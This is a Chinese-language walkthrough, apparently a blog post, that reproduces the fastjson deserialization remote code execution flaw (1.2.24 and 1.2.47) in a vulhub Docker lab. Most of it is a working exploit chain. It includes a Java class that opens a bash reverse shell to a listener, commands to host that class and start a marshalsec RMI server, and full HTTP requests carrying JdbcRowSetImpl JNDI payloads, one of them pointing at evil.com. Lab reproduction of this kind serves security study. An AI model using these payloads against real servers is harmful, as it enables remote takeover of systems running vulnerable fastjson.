fastjson简介
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
影响范围
fastjsonfastjson<=1.2.24
漏洞复现
使用vulhub
cd /app/vulhub-20201028/fastjson/1.2.24-rce
使用docker启动
docker-compose up -d
拉镜像以后,访问IP:8090
访问,可看到json格式输出
http://192.168.1.38:8090
新建一个TouchFile.java,并编译成class文件。
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.43/4444 0>&1"});
p.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
javac TouchFile.java
使用python开启站点
python -m SimpleHTTPServer 1234
http://192.168.1.43:1234/TouchFile.class
然后借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class。
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.43:1234/#TouchFile" 9999
发送请求包
POST / HTTP/1.1
Host: 192.168.1.38:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.1.43:9999/TouchFile",
"autoCommit":true
}
}
POST / HTTP/1.1
Host: 192.168.1.38:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.1.38:8888/TouchFile",
"autoCommit":true
}
}
1.2.47和1.2.24的复现过程区别
向靶场服务器发送Payload不一样,其他的过程都是一样的,1.2.47的pyload:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://evil.com:9999/Exploit",
"autoCommit":true
}